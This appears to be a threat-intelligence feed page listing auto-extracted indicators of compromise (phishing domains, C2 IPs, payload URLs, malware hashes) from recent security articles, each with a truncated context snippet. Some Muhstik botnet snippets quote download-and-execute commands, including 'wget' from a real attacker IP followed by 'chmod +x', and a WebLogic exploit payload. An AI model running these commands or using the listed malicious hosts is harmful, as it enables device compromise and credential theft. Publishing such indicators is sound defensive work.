ZeroHour

Indicators of compromise

4,114 indicators auto-extracted from article text · hashes, IPs, domains, URLs · verify before use

TypeIndicatorContextArticleFirst seen
domainrealestatecotblrp.vuhtional[.]vu monttmmlrustcompany[.]vu mtprormtductions[.]vu realestatecotblrp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcInside Knight Office, a New M365 AiTM Phishing Kit
Huntress
· 15d ago
domainsiottxgroup.vustcompany[.]vu mtprormtductions[.]vu realestatecotblrp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vuInside Knight Office, a New M365 AiTM Phishing Kit
Huntress
· 15d ago
domainsummitcapitaltrapojininggroup.vuprormtductions[.]vu realestatecotblrp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu techromixsolutionlonsinc[.]vu PhisInside Knight Office, a New M365 AiTM Phishing Kit
Huntress
· 15d ago
domaintechcompositnkoes.vurp[.]vu siottxgroup[.]vu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu techromixsolutionlonsinc[.]vu Phishing domains used by thInside Knight Office, a New M365 AiTM Phishing Kit
Huntress
· 15d ago
domaintechromixsolutionlonsinc.vuu summitcapitaltrapojininggroup[.]vu techcompositnkoes[.]vu techromixsolutionlonsinc[.]vu Phishing domains used by the threat actors involved in thInside Knight Office, a New M365 AiTM Phishing Kit
Huntress
· 15d ago
sha256ba83cc3c9535690191018edf73ca5c6001609df9919462796aa2e551f142e4d3ckage - io.base.one887 Application - StrεαmTV Pro SHA-256 - ba83cc3c9535690191018edf73ca5c6001609df9919462796aa2e551f142e4d3 Package - io.meat.hint Application - Sistema de vídeo C2 IPMeta Ads Push StreamRat Android Trojan That Can Gain Near-Complete Device Control
The Hacker News
· 15d ago
sha256e0714788b4e2518b0d9d4cbf18c7217bb97718e01689d77338f1cc4a230fcb6cd the following indicators of compromise (IoCs) - SHA-256 - e0714788b4e2518b0d9d4cbf18c7217bb97718e01689d77338f1cc4a230fcb6c Package - io.base.one887 Application - StrεαmTV Pro SHA-256Meta Ads Push StreamRat Android Trojan That Can Gain Near-Complete Device Control
The Hacker News
· 15d ago
domainplayfootball.infod by the second Apache module brought us to a domain called playfootball[.]info that has a phishing page similar to the earlier ones. UnlGaming the system: how a Chinese-speaking actor turned Brazilian government sites into an SEO weapon
Check Point Research
· 15d ago
ipv4176.65.148.184include specific log entries and the attackers’ IP address (176.65.148.184). “Given the quick succession of exploit attempts across muExploitation of Sangoma Switchvox flaw is underway (CVE-2026-9586)
Help Net Security
· 16d ago
domainapp-microsoft-edge.com.cnc-razerzone[.]com[.]cn Peripherals / drivers Microsoft Edge app-microsoft-edge[.]com[.]cn Browser Kaspersky kaspersky-lab[.]hl[.]cn Security softCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainbaidu-pan.com.cns zh-diskgenius[.]com[.]cn Disk utility Baidu Netdisk (Pan) baidu-pan[.]com[.]cn Cloud storage oCam Screen Recorder ocam-pc[.]com[.]cn SCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaincalibre-ebook.com.cnpc-razerzone[.]com[.]cn → hxxp://www.gehie246[.]com/712down calibre-ebook[.]com[.]cn → hxxp://www.gehie246[.]com/712down Brand-impersonationCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaincc8ttkv35b.comand to rotating delivery hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins711 ) and a suspected attackCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaincn-drawio.com.cnm Screen Recorder ocam-pc[.]com[.]cn Screen capture draw.io cn-drawio[.]com[.]cn Diagramming SteelSeries steelseries-cn[.]com[.]cn PeripCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaincom.cnbapc, zh-tbtool, web-tbtool, zh-doubaosrf, ieway-cn (all [.]com[.]cn / [.]hl[.]cn) Various utilities Although these domains imCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaingehie246.comnd downloading app_setup.6653004.zip from the delivery host gehie246[.]com/712down ; two content-distinct copies of the same-named aCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaingw-sogou.com.cning SteelSeries steelseries-cn[.]com[.]cn Peripherals Sogou gw-sogou[.]com[.]cn Input method Calibre calibre-ebook[.]com[.]cn E-book MiCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainhl.cnl, web-tbtool, zh-doubaosrf, ieway-cn (all [.]com[.]cn / [.]hl[.]cn) Various utilities Although these domains impersonate unrCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainkaspersky-lab.hl.cnalidated hash set is in the indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[Counterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainmindmoster.com.cnibre calibre-ebook[.]com[.]cn E-book MindMaster (typosquat) mindmoster[.]com[.]cn Mind-mapping Others pc-codex, jinshan-cibapc, zh-tbtoolCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainn7b8t85zsg.comhosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins711 ) and a suspected attacker-controlled Alibaba ClouCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainocam-pc.com.cnan) baidu-pan[.]com[.]cn Cloud storage oCam Screen Recorder ocam-pc[.]com[.]cn Screen capture draw.io cn-drawio[.]com[.]cn DiagrammingCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainoijfwe.netled Multiple C:\ProgramData\ payloads 103.183.3[.]162:5090 (oijfwe[.]net) Connection failed Stage-one / persistent payloads AlibabCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainpc-razerzone.com.cnlemetry captured a device navigating to the fake Razer page pc-razerzone[.]com[.]cn and downloading app_setup.6653004.zip from the deliveryCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainsejda.hl.cnspersky kaspersky-lab[.]hl[.]cn Security software Sejda PDF sejda[.]hl[.]cn Productivity NetEase Youdao Dictionary translate-youdaoCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainsteelseries-cn.com.cnapture draw.io cn-drawio[.]com[.]cn Diagramming SteelSeries steelseries-cn[.]com[.]cn Peripherals Sogou gw-sogou[.]com[.]cn Input method CaliCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domaintranslate-youdao.hl.cnPDF sejda[.]hl[.]cn Productivity NetEase Youdao Dictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk utCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainwww.gehie246.comns. pc-razerzone[.]com[.]cn (spoofed Razer download site) → www[.]gehie246[.]com/712down → app_setup.6653004.zip → stage-one loader A deCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainyimxg25tiy.comnation page that served it and to rotating delivery hosts ( yimxg25tiy[.]com/73inst , cc8ttkv35b[.]com/7qinst , n7b8t85zsg[.]com/ins71Counterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainzh-diskgenius.com.cnictionary translate-youdao[.]hl[.]cn Translation DiskGenius zh-diskgenius[.]com[.]cn Disk utility Baidu Netdisk (Pan) baidu-pan[.]com[.]cn CCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
sha2561bd3662d784840e410d2d3c0a1040277f7f549089447359f01e05c2559cb1f17ocessFolderPath C:\ProgramData\.exe InitiatingProcessSHA256 1bd3662d784840e410d2d3c0a1040277f7f549089447359f01e05c2559cb1f17 InitiatingProcessCommandLine ".exe" InitiatingProcessCreatiCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
sha2566d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8ogram Files (x86)\72q1o6\40gK5T.exe InitiatingProcessSHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8 InitiatingProcessCommandLine "40gK5T.exe" InitiatingProcessCounterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
urlhttp://www.gehie246[e indicators of compromise below. kaspersky-lab[.]hl[.]cn → hxxp://www.gehie246[.]com/712down pc-razerzone[.]com[.]cn → hxxp://www.gehie246[Counterfeit installers to system compromise: Tracking a deceptive software download campaign
Microsoft Security Blog
· 16d ago
domainaguamammillaria.cfdh4htc0h0ggdh.canadacentral-01.azurewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain:Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
domainaguasedum.cfdurewebsites[.]net plosancol.aguamammillaria[.]cfd crironxil.aguasedum[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pinggGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
domainazurewebsites.nete text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortcut: SGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
domaincolombstracciatella.cfdr: "Contrato Via Docusing" <[email protected][.]cfd> Date: Wed, 26 Aug 2026 19:01:16 -0300 Subject: Assine coGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
domainpinggy.linkm[.]cfd TCP traffic to another domain: tcp[:]//omzagdmspc.a.pinggy[.]link:21601/ Note: I saw HTTPS traffic to WhatsApp and GitHub dGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
email[email protected]2026 22:01:41 +0000 (UTC) Sender: "Contrato Via Docusing" <[email protected][.]cfd> Date: Wed, 26 Aug 2026 19:01:16 -0300 Subject: AssinGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
ipv4185.254.222.105ceived: from relatorio01a.colombstracciatella.cfd (unknown [185.254.222.105]) [information removed] ; Wed, 26 Aug 2026 22:01:41 +0000 (Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
sha25647d2908c4dd7f6f5eb4a8ef4306077b10315c44231f4bacd2bb811b245561911e: Zip archive data, at least v2.0 to extract SHA-256 hash: 47d2908c4dd7f6f5eb4a8ef4306077b10315c44231f4bacd2bb811b245561911 File size: 1,553 bytes File name: 868283789726483.lNk FileGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
sha256a6044786991afdb9d42ceb350943987765a7d0e8537369b2092e3f019c0f63cahe infection, doesn't appear to be malicious: SHA-256 hash: a6044786991afdb9d42ceb350943987765a7d0e8537369b2092e3f019c0f63ca File size: 266,242 bytes File type: PE32+ executable (DLL)Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
sha256cc44782356cb0effc528a7ab22c19ab360a55ebbbe01feb0967031aa191c5869d zip archive and extracted Windows shortcut: SHA-256 hash: cc44782356cb0effc528a7ab22c19ab360a55ebbbe01feb0967031aa191c5869 File size: 1,661 bytes File name: 868283789726483.zip FileGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
sha256f62a958faf0491b2b2803be2ee69b664b58e4a1261f64e8530cdc1a3ff666aa4It script for the persistent Guildma malware: SHA-256 hash: f62a958faf0491b2b2803be2ee69b664b58e4a1261f64e8530cdc1a3ff666aa4 File size: 277,874 bytes File type: Data File location: C:\Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
urlhttps://sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[684.BPSE.CONTRATOS.DIGITAIS.pdf Link from the message text: hxxps[:]//sistema-ekg3h4htc0h0ggdh.canadacentral-01.azurewebsites[.]net/ Downloaded zip archive and extracted Windows shortcGuildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)
SANS Internet Storm Center
· 16d ago
domaincentrodigestionedellarapina.lifeate. Indicators of compromise (IOCs) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address useFake GTA 6 leaked copy drains your crypto wallet
Malwarebytes Labs
· 16d ago
domaindasunerforschtelandamendederwelt.sbs) Drainer infrastructure centrodigestionedellarapina[.]life dasunerforschtelandamendederwelt[.]sbs Solana address used by the page’s inline transfer 21iWU6FFake GTA 6 leaked copy drains your crypto wallet
Malwarebytes Labs
· 16d ago
ipv4176.65.148.184pts originating from: Indicator Type Description IP Address 176.65.148.184 was observed targeting the vulnerable Switchvox /pa endpoinCVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability
Horizon3.ai
· 16d ago
ipv48.2.2.1release notes describe CVE-2026-9586 as affecting Switchvox 8.2.2.1, while the CNA record specifies 8.3 (104997). OrganizationsCVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability
Horizon3.ai
· 16d ago
ipv48.4.0.2goma Switchvox SMB Edition 8.3 (104997), versions less than 8.4.0.2 The available public sources contain some inconsistency regCVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability
Horizon3.ai
· 16d ago
domainip.me’t belong to the face on the video call. “The user accessed ip[.]me directly to determine their public-facing IP address justNorth Korea-linked IT Workers Are Getting Hired Inside Western Companies
Security Affairs
· 16d ago
domainclaude.aiso: How attackers hosted a fake Claude download page on the claude.ai domain Subscribe to our breaking news e-mail alert to neverAnthropic locks out Claude users after infostealers hijack login sessions
Help Net Security
· 18d ago
domainhunt.iooud and WordPress systems. The activity was uncovered after Hunt.io found an exposed server in Amsterdam that contained attackPhilippine Nuclear and Naval Targets Hit by Suspected Chinese Operator
Security Affairs
· 19d ago
domaindocopened.jpghxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. This serves as a document-open “canary,” alerting BlueDeRussian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations
Security Affairs
· 20d ago
domainwebhook.siteins a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg. ThiRussian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations
Security Affairs
· 20d ago
urlhttp://webhook[o contains a hidden image referencing a remote webhook URL: hxxp://webhook[.]site/62114596-33f5-47fb-9012-0223529e5a13/docopened[.]jpg.Russian APT BlueDelta Uses HOOKEDGE to Target Defense and Diplomatic Organizations
Security Affairs
· 20d ago
domainajax.nettructure Security Agency (CISA) adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler flU.S. CISA adds Red Hat, Linux Kernel, Ajax.NET Professional, Microsoft SQL Server, and Citrix NetScaler flaws to its Known Exploited Vulnerabilities catalog
Security Affairs
· 20d ago
domaingetpdfdigital.clouder to a shortened URL that resolves through a redirector to getpdfdigital[.]cloud, a known attacker site used to stage malicious payloads.Dark Caracal Deploys New Go Malware With Ethereum-Based C2 Fallback
Security Affairs
· 21d ago
domainajax.net-2015-5287), a Microsoft SQL Server bug (CVE-2019-1068), an Ajax.NET deserialization flaw (CVE-2021-23758), and a Linux Kernel vPreviously patched Citrix NetScaler flaw exploited in the wild (CVE-2026-8452)
Help Net Security
· 22d ago
domainnova-client.come official websites, only GitHub pages and Discord servers. Nova-client.com is a fake website for a client that has no real website; thFake Minecraft Sites Are Still Spreading WeedHack After C2 Takedown
Security Affairs
· 23d ago
domaintrycloudflare.comhenticated session. In the demo, the fake login page used a trycloudflare.com subdomain, giving the link a valid TLS certificate and a moiAuthFlow v2: The $10,000 Phishing Toolkit That Survives Your Password Reset
Security Affairs
· 24d ago
domaincardoor.cnnstructions from a message broker hosted on a domain called cardoor[.]cn, which tells it which app files to download and install.Android car head units infected with proxy botnet malware through built-in software updaters
Help Net Security
· 25d ago
domainclasstandscrest.comewhere for suspected fraud. The public registration page at classtandscrest[.]com (Source: Allure Security) What to check Researchers recomA $25 template helped scammers build hundreds of phantom bank domains
Help Net Security
· 28d ago
domainremedycodes.siten form was set to send submitted data to a separate domain, remedycodes[.]site. Researchers did not submit the form. That same Remedy adA $25 template helped scammers build hundreds of phantom bank domains
Help Net Security
· 28d ago
domaindtm.kijangturbo88.topthat communicated with Telegram-based infrastructure, using dtm[.]kijangturbo88[.]top as its command-and-control endpoint. “While the malwareFake Gemini installer delivers Vidar infostealer via Google Colab lure
Help Net Security
· 29d ago
domainfd6fq54s6df541q23sdxfg.eummand is used to download a binary called nvr from http://y.fd6fq54s6df541q23sdxfg[.]eu/nvr 1 2 3 4 / bin / sh - c nvram set rc_firewall = "sleepMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
domainmods.net.156[.]190/.y/pty5 hxxp://159.89.156[.]190/.y/pty6 s.shadow.mods[.]net Samples Filename SHA256 File type tty0 492780a9ac9f033055Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
ipv4132.223.202.213like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 132.223.202.213 Scan #3: CVE-2019-2725 - WebLogic versions 10.3.6.0 and 12.Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
ipv4159.89.156.190DE . 1 2 3 4 5 6 7 8 9 10 11 wget - O / tmp / pty1 http : //159.89.156.190/.y/pty1; chmod +x / tmp / pty1 ; chmod 700 / tmp / pty1 ; /Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
ipv4165.227.78.159> < / void > < void index = '2' > < string > wget http : //165.227.78.159/wl.php</string> </void> </array> <void method = 'start' / >Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
ipv4194.187.209.4like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 194.187.209.4 Content - Type : text / xml content - length : 916 < soapenMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha2562548f5b1613f6ebba2ff589c7b3416ccdd066b73644d4d212232beb1cecd9c3138b360d8a836c038da4920e8c1ae620988b120613c0b1f MIPS-ELF nvr 2548f5b1613f6ebba2ff589c7b3416ccdd066b73644d4d212232beb1cecd9c31 Shell script Pty1 a4ba50129408f9f52ddabe5bfd5bfb46aea0ca48fMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha256492780a9ac9f03305538b360d8a836c038da4920e8c1ae620988b120613c0b1fs.shadow.mods[.]net Samples Filename SHA256 File type tty0 492780a9ac9f03305538b360d8a836c038da4920e8c1ae620988b120613c0b1f MIPS-ELF nvr 2548f5b1613f6ebba2ff589c7b3416ccdd066b73644d4dMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha25672123c51bcdf8c1784654d9e2470e69131872407408aa3cf775ea0ace87bb9a0c04ae2ae8f2792711203de50d3d16de3a9f83baaf5435 MIPS-ELF Pty5 72123c51bcdf8c1784654d9e2470e69131872407408aa3cf775ea0ace87bb9a0 ARM-ELF Pty6 cee20e79f20d35b95645f0cbda1897302e6e554c50f3e6Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha2567325742dc0d939542d4c04ae2ae8f2792711203de50d3d16de3a9f83baaf5435abe5bfd5bfb46aea0ca48fb616f495f2610b2f1729687 MIPS-ELF Pty3 7325742dc0d939542d4c04ae2ae8f2792711203de50d3d16de3a9f83baaf5435 MIPS-ELF Pty5 72123c51bcdf8c1784654d9e2470e69131872407408aaMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha256a4ba50129408f9f52ddabe5bfd5bfb46aea0ca48fb616f495f2610b2f1729687c7b3416ccdd066b73644d4d212232beb1cecd9c31 Shell script Pty1 a4ba50129408f9f52ddabe5bfd5bfb46aea0ca48fb616f495f2610b2f1729687 MIPS-ELF Pty3 7325742dc0d939542d4c04ae2ae8f2792711203de50d3Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha256cee20e79f20d35b95645f0cbda1897302e6e554c50f3e6754ce9293e3c1ba11c654d9e2470e69131872407408aa3cf775ea0ace87bb9a0 ARM-ELF Pty6 cee20e79f20d35b95645f0cbda1897302e6e554c50f3e6754ce9293e3c1ba11c ARM-ELF daymon dc52a1193ecf6096192f771ae663de6e0389840cb5ceMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
sha256dc52a1193ecf6096192f771ae663de6e0389840cb5ceb7b979091333ce6f7f02f0cbda1897302e6e554c50f3e6754ce9293e3c1ba11c ARM-ELF daymon dc52a1193ecf6096192f771ae663de6e0389840cb5ceb7b979091333ce6f7f02 ARM-ELFMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://159.89.156[Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.]190/.y/pty3 hxxp://159.89.Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://165.227.78[nv : Body > < / soapenv : Envelope > We think that this URL hxxp://165.227.78[.]159/wl.php is used for the reporting purpose. Because, theMuhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
urlhttp://y.fd6fq54s6df541q23sdxfg[.233[.]35 68.66.253[.]100 185.61.149[.]22 Domains and URLs: hxxp://y.fd6fq54s6df541q23sdxfg[.]eu/nvr hxxp://159.89.156[.]190/.y/pty1 hxxp://159.89.156[.Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices
Palo Alto Unit 42
· 29d ago
domaineleethub.coms from Eleethub The domain associated with the C2 server is eleethub[.]com . We visited the website and found a message announcing tEleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
domainlos.zetas.mx, and in the information from the botnet operators undead[@]los[.]zetas[.]mx (Figure 15). “Los Zetas” is a reference to a Mexican crEleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
sha25614c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4 14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358 6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c1952Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
sha2566d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b1d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bd36358 6d1fe6ab3cd04ca5d1ab790339ee2b6577553bc042af3b7587ece0c195267c9b C2 servers eleethub[.]com irc.eleethub[.]com ghost.eleethubEleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
sha2567ed8fc4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6nets targeting IoT devices Indicators of Compromise Samples 7ed8fc4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6 dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
sha256d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e45cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6 d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0412e4 14c351d76c4e1866bca30d65e0538d94df19b0b3927437bda653b7a73bdEleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
sha256dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6c4ad8014da327278b6afc26a2b4d4c8326a681be2d2b33fb2386eade3c6 dbef55cc0e62e690f9afedfdbcfebd04c31c1dcc456f89a44acd516e187e8ef6 d9001aa2d7456db3e77b676f5d265b4300aaef2d34c47399975a4f1a8f0Eleethub: A Cryptocurrency Mining Botnet with Rootkit for Self
Palo Alto Unit 42
· 29d ago
domaindownloads.openwrt.orgin OpenWrt allowed attackers to impersonate downloads from downloads.openwrt.org and make the devices download malicious updates. This meansRisks in IoT Supply Chain
Palo Alto Unit 42
· 29d ago
domainiotlmao.xyz5889c244501288b9fa7c7dc7f1e8c5ef1291 Feb 26, 2021 13:14 UTC iotlmao[.]xyz/bins/dark.m68k a6cb6356432ca83467f6da2168be2aabbabe5d2f2dNew Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha2560039231b2fd5e5a3d86ae3b626d35b8fed7f2887a58e32b480ac82cd82150f7c41b1 Feb 24, 2021 15:59 UTC 185[.]239.242.63/bins/dark.mpsl 0039231b2fd5e5a3d86ae3b626d35b8fed7f2887a58e32b480ac82cd82150f7c Feb 24, 2021 15:59 UTC 185[.]239.242.63/bins/dark.ppc 9d55aNew Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha25602d48570f1089e2e7f4f9256bb033136c773834af31054e477e094e48cba110e0f30 Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.m68k 02d48570f1089e2e7f4f9256bb033136c773834af31054e477e094e48cba110e Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.mips 45ffNew Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha25602f08ccc4a4136c89276135664267e08f1bb6795842a84c06c15478d3c3101e680a5 Feb 22, 2021, 12:32 UTC 185[.]239.242.63/bins/dark.sh4 02f08ccc4a4136c89276135664267e08f1bb6795842a84c06c15478d3c3101e6 Feb 22, 2021, 12:32 UTC 185[.]239.242.63/bins/dark.x86 f467New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha25605102e5abb23c761426c2c0f19f70f650938ea9e9295ccbb92349513c1d26c638684e17 Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.mips 05102e5abb23c761426c2c0f19f70f650938ea9e9295ccbb92349513c1d26c63 Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.mpsl cc996d1New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha256087fc3206ddb94e80118e7e7f0215c88409a0071b657d21071e15b7917f7cc4e3e61 Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.arm6 087fc3206ddb94e80118e7e7f0215c88409a0071b657d21071e15b7917f7cc4e Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.arm7 33f7New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha2560a664a74fcc00910170edcd5f548569b40c2c5d58fc5ced1f475dbe938684e175da833f Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.m68k 0a664a74fcc00910170edcd5f548569b40c2c5d58fc5ced1f475dbe938684e17 Mar 4, 2021 10:19 UTC 45[.]133.1.133/bins/dark.mips 05102e5New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha2560bbdb062ecfae7e1b59084a5e5fe052908ecfdea7db0777a9c318e9e55fdb5ff7d871 Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.ppc 0bbdb062ecfae7e1b59084a5e5fe052908ecfdea7db0777a9c318e9e55fdb5ff Mar 13, 2021 02:43 UTC 203[.]159.80.241/bins/dark.sh4 77a1fNew Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
sha2560c4ec06f32d5f15846239d224d68086cbeaf513b63f0fcafa4eddd8e18a3d372ea04b Mar 11, 2021 12:59 UTC 203[.]159.80.241/bins/dark.ppc 0c4ec06f32d5f15846239d224d68086cbeaf513b63f0fcafa4eddd8e18a3d372 Mar 11, 2021 12:30 UTC 203[.]159.80.241/bins/dark.sh4 2f590New Mirai Variant Targeting Network Security Devices
Palo Alto Unit 42
· 29d ago
